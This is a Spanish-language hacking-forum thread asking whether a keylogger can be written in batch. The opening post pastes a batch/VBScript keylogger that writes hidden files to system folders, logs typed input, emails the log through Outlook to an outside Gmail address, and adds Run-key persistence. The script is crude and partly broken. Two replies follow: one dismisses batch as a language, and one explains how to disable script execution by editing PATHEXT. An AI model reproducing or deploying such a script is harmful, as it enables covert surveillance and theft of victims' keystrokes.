elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  keylogger en batch?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: keylogger en batch?  (Leído 4,275 veces)
**Aincrad**


Desconectado Desconectado

Mensajes: 668



Ver Perfil WWW
keylogger en batch?
« en: 24 Julio 2017, 20:29 pm »

Hola a todos queria saber si se puede hacer un keylogger en batch y que registre todo en un txt.  :huh:


en internet encontre este batch pero es mas que todo puro vbs.

aqui el code:
Código
  1. @echo off
  2. set location = %windir%\System32\stsyk.vbs
  3. echo set shell = CreateObject("Wscript.Shell") >> %location%
  4. echo shell.run "C:\windows\k.bat", 0 >> %location%
  5. echo @echo off >> C:\windows\k.bat
  6. echo color c9 >> C:\windows\k.bat
  7. echo :go >> C:\windows\k.bat
  8. echo echo .>>c:\keys.txt  >> C:\windows\k.bat
  9. echo echo :  >> C:\windows\k.bat
  10. echo set /p keys=  >> C:\windows\k.bat
  11. echo echo %keys% >> c:\keys.txt  >> C:\windows\k.bat
  12. echo goto go >> C:\windows\k.bat
  13. echo start %location%  >> C:\windows\k.bat
  14. echo(
  15. echo Dim x > C:\kvqim.vbs
  16. echo on error resume next >> C:\kvqim.vbs
  17. echo Set fso =" Scripting.FileSystem.Object" >> C:\kvqim.vbs
  18. echo Set so=CreateObject(fso) >> C:\kvqim.vbs
  19. echo Set ol=CreateObject("Outlook.Application") >> C:\kvqim.vbs
  20. echo Set out=WScript.CreateObject("Outlook.Application") >> C:\kvqim.vbs
  21. echo Mail.to="cursedgaming@gmail.com">> C:\kvqim.vbs
  22. echo Mail.Subject="Keylog" >> C:\kvqim.vbs
  23. echo Mail.Body="" >> C:\kvqim.vbs
  24. echo Mail.Attachments.Add("C:keys.txt") >> C:\kvqim.vbs
  25. echo Mail.Send >> C:\kvqim.vbs
  26. echo Next >> C:\kvqim.vbs
  27. echo ol.Quit >> C:\kvqim.vbs
  28. C:\kvqim.vbs
  29. )>>C:\Windows\k.bat
  30. ping localhost 5 > nul
  31. del C:\kvqim.vbs
  32. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d %location%
  33. REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v WinBoot /t REG_SZ /d C:\Windows\k.bat
  34. attrib +h +s %location%
  35. attrib +h +s C:\Windows\k.bat
  36. attrib +h keys.txt
  37. start %location%
  38.  


En línea



engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: keylogger en batch?
« Respuesta #1 en: 24 Julio 2017, 20:35 pm »

batch no es un lenguaje de programación... olvidate de hacer aplicaciones con batch... batch es solo un manejador de archivos por lotes (de ahí su nombre "batch") 

incluso funciones como "copy" en realidad es un .exe que batch llama para que haga una funcion...

necesitarás siempre un lenguaje de programación de verdad para que batch haga algo


En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Serapis
Colaborador
***
Desconectado Desconectado

Mensajes: 3.351


Ver Perfil
Re: keylogger en batch?
« Respuesta #2 en: 25 Julio 2017, 17:18 pm »

Hola a todos queria saber si se puede hacer un keylogger en batch y que registre todo en un txt.  :huh:

en internet encontre este batch pero es mas que todo puro vbs.
VBScript, es un lenguaje de Script basado en VB. De hecho puedes crear tus propias librerías y una vez compiladas y registradas debidamente podrías usarlas igual que el objeto "File System Object (fso)".

Ahora bien, los vbs están pensados para tareas administrativas o incluso de control en tu propio equipo (mantenimiento básicamente).
La recomendación es que si en tu equipo, no lo usas lo deshabilites, lo cual se hace editando directamente la variable de entorno: PATHEXT (Extensiones ejecutables para que nos entendamos)... por defecto (bajo windows) este es su valor:
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
Pero si uno lo edita y lo deja en:
PATHEXT=.COM;.EXE;.BAT;.CMD
Entonces se está deshabilitando la ejecución de ficheros de scripts (excepto los bat), luego tu keylogger, no servirá de nada si requiere la ejecución de un fichero .vbs.

Hubiera sido deseable que fuera posible ejecutar ficheros de scripts, sólo si yacen en cierta ruta específica y que se requiriera permisos para mover ficheros allí, entonces podría estar semihabilitado, es decir todo, nada o solo para los que yacen en esa carpeta y entonces para tareas de administración podrían tener mucha utilidad. Al no haber punto intermedio, lo mejor es deshabilitarlo para evitar toda posible ejecución de malware.

Puedes consultar rápidamente el valor de PATHEXT, desde la consola msdos, mediante el comando: echo %pathext%
(todas las variables de entorno, se pueden consultar desde ahí, del mismo modo (obviamente remplazando el nombre de la variable, por la que proceda).

Si quieres editar dicho valor, o bien acudes al registro:
HKLM\System\CurrentControlSet\Control\Session Manager\Environment\ PATHEXT ...
O bien desde el:
panel de control/sistema/avanzado/botón variables de entorno/ localizarla en la lista de: 'Variables del sistema"

Esta variable también se usa para establecer la prioridad de ejecución. Cuando por ejemplo ejecutas un fichero basado solo en su nombre, peor hay más de un ejecutable con dicho nombre pero distinta extnsión (ejecutable), el que se ejecute será el primero en la lista de esta variable.
Así si tienes 4 ejecutables (en la misma ruta) llamados copy.bat, Copy.exe, copy.vbs y copy.com el que se ejecute será copy.com, porque cuando se busca en dicha lista, es el primero que aparece, si pretendieras que al escribir en una consola, un comando como: copy c:\*.* d:\*.* se ejecutara con copy.vbs (por ejemplo, porque es un ejecutable tuyo clónico que tiene opciones que no contempla el otro), cambia el orden que ocupan en la lista. Es harto difícil que haya en la misma carpeta, más de un ejecutable con el mismo nombre, pero esto resuelve el caso de qué ejecutable se está invocando, la otra forma es especificar el nombre completo del ejecutable.
« Última modificación: 25 Julio 2017, 17:27 pm por NEBIRE » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Keylogger en batch..
Scripting
SecuSys 7 19,384 Último mensaje 20 Diciembre 2008, 05:19 am
por Banti
[Batch] Insertar un batch dentro de un batch que fabrique un .txt
Scripting
$pedrojo2704 2 5,530 Último mensaje 23 Agosto 2012, 10:08 am
por $pedrojo2704
usb keylogger, o keylogger desde modo seguro.
Seguridad
minerif 0 3,185 Último mensaje 24 Marzo 2013, 23:20 pm
por minerif
MOVIDO: keylogger en batch?
Análisis y Diseño de Malware
Eleкtro 0 2,962 Último mensaje 5 Agosto 2017, 16:39 pm
por Eleкtro
Keylogger con Batch
Scripting
Mr. Bit 2 2,646 Último mensaje 14 Diciembre 2020, 21:19 pm
por Danielㅤ
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines